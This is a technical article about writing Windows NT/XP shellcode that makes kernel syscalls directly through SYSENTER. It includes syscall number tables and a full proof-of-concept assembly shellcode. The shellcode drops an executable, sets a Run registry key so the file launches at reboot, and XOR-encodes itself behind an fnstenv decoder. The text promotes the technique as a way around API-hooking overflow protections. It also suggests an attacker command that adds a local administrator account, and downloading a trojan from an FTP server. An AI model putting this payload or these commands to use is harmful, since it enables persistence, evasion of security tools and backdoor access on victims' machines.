In Windows 2000 (and other NT based systems except XP and newer) no SYSENTER instruction is used. However, in Windows XP the "int 2eh" (our old way) was replaced by SYSENTER instruction. The following schema shows the syscall implementation for Windows 2000:

MOV EAX, SyscallNumber ; requested syscall number
LEA EDX, [ESP+4] ; EDX = params...
INT 2Eh ; throw the execution to the KM handler
RET 4*NUMBER_OF_PARAMS ; return

We know already the Windows XP way, however here is the one I'm using in shellcode:

push fn ; push syscall number
pop eax ; EAX = syscall number
push eax ; this one makes no diff
call b ; put caller address on stack
b: add [esp],(offset r - offset b) ; normalize stack
mov edx, esp ; EDX = stack
db 0fh, 34h ; SYSENTER instruction
r: add esp, (param*4) ; normalize stack

It seems that SYSENTER was first introduced in the Intel Pentium II processors. This author is not certain but one can guess that SYSENTER is not supported by Athlon processors. To determine if the instruction is available on a particular processor, use the CPUID instruction together with a check for the SEP flag and some specific family/model/stepping checks. Here is the example how Intel does this type of checking:

IF (CPUID SEP bit is set)
THEN IF (Family = 6) AND (Model < 3) AND (Stepping < 3)
THEN
SYSENTER/SYSEXIT_NOT_SUPPORTED
FI;
ELSE SYSENTER/SYSEXIT_SUPPORTED
FI;

But of course this is not the only difference in various Windows operating systems -- system call numbers also change between the various Windows versions, as the following table shows:
Syscall symbol NtAddAtom NtAdjustPrivilegesToken NtAlertThread
Windows NT SP 3 0x3 0x5 0x7
SP 4 0x3 0x5 0x7
SP 5 0x3 0x5 0x7
SP 6 0x3 0x5 0x7
Windows 2000 SP 0 0x8 0xa 0xc
SP 1 0x8 0xa 0xc
SP 2 0x8 0xa 0xc
SP 3 0x8 0xa 0xc
SP 4 0x8 0xa 0xc
Windows XP SP 0 0x8 0xb 0xd
SP 1 0x8 0xb 0xd
SP 2 0x8 0xb 0xd
Windows 2003 Server SP 0 0x8 0xc 0xe
SP 1 0x8 0xc 0xe

The syscall number tables are available on the Internet. The reader is advised to look at the one from metasploit.com, however other sources may also be good.

Syscall shellcode advantages
There are several advantages when using this approach:

* Shellcode doesn't require the use APIs, due to the fact that it doesn't have to locate API addresses (there is no kernel address finding/no export section parsing/import section parsing, and so on). Due to this "feature" it is able to bypass most of ring3 "buffer overflow prevention systems." Such protection mechanisms usually don't stop the buffer overflow attacks in itself, but instead they mainly hook the most used APIs and check the caller address. Here, such checking would be of no use.
* Since you are sending the requests directly to the kernel handler and you "jump over" all of those instructions from the Win32 Subsystem, the speed of execution highly increases (although in the era of modern processors, who truly cares about speed of shellcode?).

Syscall shellcode disadvantages
There are also several disadvantages to this approach:

* Size -- this is the main disadvantage. Becase we are "jumping over" all of those subsytem wrappers, we need to code our own ones, and this increases the size of shellcode.
* Compability -- as has been written above, there exist various implementations from "int 2eh" to "sysenter," depending on the operating system version. Also, the system call number changes together with each Windows version (for more see the References section).

The ideas
The shellcode at the end of this article dumps a file and then writes an registry key. This action causes execution of the dropped file after the computer reboots. Many of you may ask me why we would not to execute the file directly without storing the registry key. Well, executing win32 application by syscalls is not a simple task -- don't think that NtCreateProcess will do the job; let's look at what CreateProcess API must do to execute an application:

1. Open the image file (.exe) to be executed inside the process.
2. Create the Windows executive process object.
3. Create the initial thread (stack, context, and Windows executive thread object).
4. Notify the Win32 subsystem of the new process so that it can set up for the new process and thread.
5. Start execution of the initial thread (unless the CREATE_SUSPENDED flag was specified).
6. In the context of the new process and thread, complete the initialization of the address space (such as load required DLLs) and begin execution of the program.

Therefore, it is clearly much easier and quicker to use the registry method. The following shellcode that concludes this raticle drops a sample MessageBox application (mainly, a PE struct which is big itself so the size increases) however there are plenty more solutions. Attacker can drop some script file (batch/vbs/others) and download a trojan/backdoor file from an ftp server, or just execute various commands such as: "net user /add piotr test123" & "net localgroup /add administrators piotr". This idea should help the reader with optimizations, now enjoy the proof of concept shellcode.
The shellcode - Proof Of Concept

comment $
-----------------------------------------------
WinNT (XP) Syscall Shellcode - Proof Of Concept
-----------------------------------------------
Written by: Piotr Bania
http://pb.specialised.info
$
include my_macro.inc
include io.inc
; --- CONFIGURE HERE -----------------------------------------------------------------
; If you want to change something here, you need to update size entries written above.
FILE_PATH equ "\??\C:\b.exe",0 ; dropper
SHELLCODE_DROP equ "D:\asm\shellcodeXXX.dat" ; where to drop
; shellcode
REG_PATH equ "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\Run",0
; ------------------------------------------------------------------------------------
KEY_ALL_ACCESS equ 0000f003fh ; const value
_S_NtCreateFile equ 000000025h ; syscall numbers for
_S_NtWriteFile equ 000000112h ; Windows XP SP1
_S_NtClose equ 000000019h
_S_NtCreateSection equ 000000032h
_S_NtCreateKey equ 000000029h
_S_NtSetValueKey equ 0000000f7h
_S_NtTerminateThread equ 000000102h
_S_NtTerminateProcess equ 000000101h
@syscall macro fn, param ; syscall implementation
local b, r ; for Windows XP
push fn
pop eax
push eax ; makes no diff
call b
b: add [esp],(offset r - offset b)
mov edx, esp
db 0fh, 34h
r: add esp, (param*4)
endm
path struc ; some useful structs
p_path dw MAX_PATH dup (?) ; converted from C headers
path ends
object_attributes struc
oa_length dd ?
oa_rootdir dd ?
oa_objectname dd ?
oa_attribz dd ?
oa_secdesc dd ?
oa_secqos dd ?
object_attributes ends
pio_status_block struc
psb_ntstatus dd ?
psb_info dd ?
pio_status_block ends
unicode_string struc
us_length dw ?
dw ?
us_pstring dd ?
unicode_string ends
call crypt_and_dump_sh ; xor and dump shellcode
sc_start proc
local u_string :unicode_string ; local variables
local fpath :path ; (stack based)
local rpath :path
local obj_a :object_attributes
local iob :pio_status_block
local fHandle :DWORD
local rHandle :DWORD
sub ebp,500 ; allocate space on stack
push FILE_PATH_ULEN ; set up unicode string
pop [u_string.us_length] ; length
push 255 ; set up unicode max string
pop [u_string.us_length+2] ; length
lea edi,[fpath] ; EDI = ptr to unicode file
push edi ; path
pop [u_string.us_pstring] ; set up the unciode entry
call a_p1 ; put file path address
a_s: db FILE_PATH ; on stack
FILE_PATH_LEN equ $ - offset a_s
FILE_PATH_ULEN equ 18h
a_p1: pop esi ; ESI = ptr to file path
push FILE_PATH_LEN ; (ascii one)
pop ecx ; ECX = FILE_PATH_LEN
xor eax,eax ; EAX = 0
a_lo: lodsb ; begin ascii to unicode
stosw ; conversion do not forget
loop a_lo ; to do sample align
lea edi,[obj_a] ; EDI = object attributes st.
lea ebx,[u_string] ; EBX = unicode string st.
push 18h ; sizeof(object attribs)
pop [edi.oa_length] ; store
push ebx ; store the object name
pop [edi.oa_objectname]
push eax ; rootdir = NULL
pop [edi.oa_rootdir]
push eax ; secdesc = NULL
pop [edi.oa_secdesc]
push eax ; secqos = NULL
pop [edi.oa_secqos]
push 40h ; attributes value = 40h
pop [edi.oa_attribz]
lea ecx,[iob] ; ECX = io status block
push eax ; ealength = null
push eax ; eabuffer = null
push 60h ; create options
push 05h ; create disposition
push eax ; share access = NULL
push 80h ; file attributes
push eax ; allocation size = NULL
push ecx ; io status block
push edi ; object attributes
push 0C0100080h ; desired access
lea esi,[fHandle]
push esi ; (out) file handle
@syscall _S_NtCreateFile, 11 ; execute syscall
lea ecx,[iob] ; ecx = io status block
push eax ; key = null
push eax ; byte offset = null
push main_exploit_s ; length of data
call a3 ; ptr to dropper body
s1: include msgbin.inc ; dopper data
main_exploit_s equ $ - offset s1
a3: push ecx ; io status block
push eax ; apc context = null
push eax ; apc routine = null
push eax ; event = null
push dword ptr [esi] ; file handle
@syscall _S_NtWriteFile, 9 ; execute the syscall
mov edx,edi ; edx = object attributes
lea edi,[rpath] ; edi = registry path
push edi ; store the pointer
pop [u_string.us_pstring] ; into unicode struct
push REG_PATH_ULEN ; store new path len
pop [u_string.us_length]
call a_p2 ; store the ascii reg path
a_s1: db REG_PATH ; pointer on stack
REG_PATH_LEN equ $ - offset a_s1
REG_PATH_ULEN equ 7eh
a_p2: pop esi ; esi ptr to ascii reg path
push REG_PATH_LEN
pop ecx ; ECX = REG_PATH_LEN
a_lo1: lodsb ; little ascii 2 unicode
stosw ; conversion
loop a_lo1
push eax ; disposition = null
push eax ; create options = null
push eax ; class = null
push eax ; title index = null
push edx ; object attributes struct
push KEY_ALL_ACCESS ; desired access
lea esi,[rHandle]
push esi ; (out) handle
@syscall _S_NtCreateKey,6
lea ebx,[fpath] ; EBX = file path
lea ecx,[fHandle] ; ECX = file handle
push eax
pop [ecx] ; nullify file handle
push FILE_PATH_ULEN - 8 ; push the unicode len
; without 8 (no '\??\')
push ebx ; file path
add [esp],8 ; without '\??'
push REG_SZ ; type
push eax ; title index = NULL
push ecx ; value name = NULL = default
push dword ptr [esi] ; key handle
@syscall _S_NtSetValueKey,6 ; set they key value
dec eax
push eax ; exit status code
push eax ; process handle
; -1 current process
@syscall _S_NtTerminateProcess,2 ; maybe you want
; TerminateThread instead?
ssc_size equ $ -offset sc_start
sc_start endp
exit:
push 0
@callx ExitProcess
crypt_and_dump_sh: ; this gonna' xor
; the shellcode and
mov edi,(offset sc_start - 1) ; add the decryptor
mov ecx,ssc_size ; finally shellcode file
; will be dumped
xor_loop:
inc edi
xor byte ptr [edi],96h
loop xor_loop
_fcreat SHELLCODE_DROP,ebx ; some of my old crazy
_fwrite ebx,sh_decryptor,sh_dec_size ; io macros
_fwrite ebx,sc_start,ssc_size
_fclose ebx
jmp exit
sh_decryptor: ; that's how the decryptor
xor ecx,ecx ; looks like
mov cx,ssc_size
fldz
sh_add: fnstenv [esp-12] ; fnstenv decoder
pop edi
add edi,sh_dec_add
sh_dec_loop:
inc edi
xor byte ptr [edi],96h
loop sh_dec_loop
sh_dec_add equ ($ - offset sh_add) + 1
sh_dec_size equ $ - offset sh_decryptor
end start

Final words
The author hopes you have enjoyed the article. If you have any comments don't hesitate to contact him; also remember that code was developed purely for educational purposes only.
Further reading

1. "Inside the Native API" by Mark Russinovich
2. "MSDN" from Microsoft
3. Interactive Win32 syscall page from Metasploit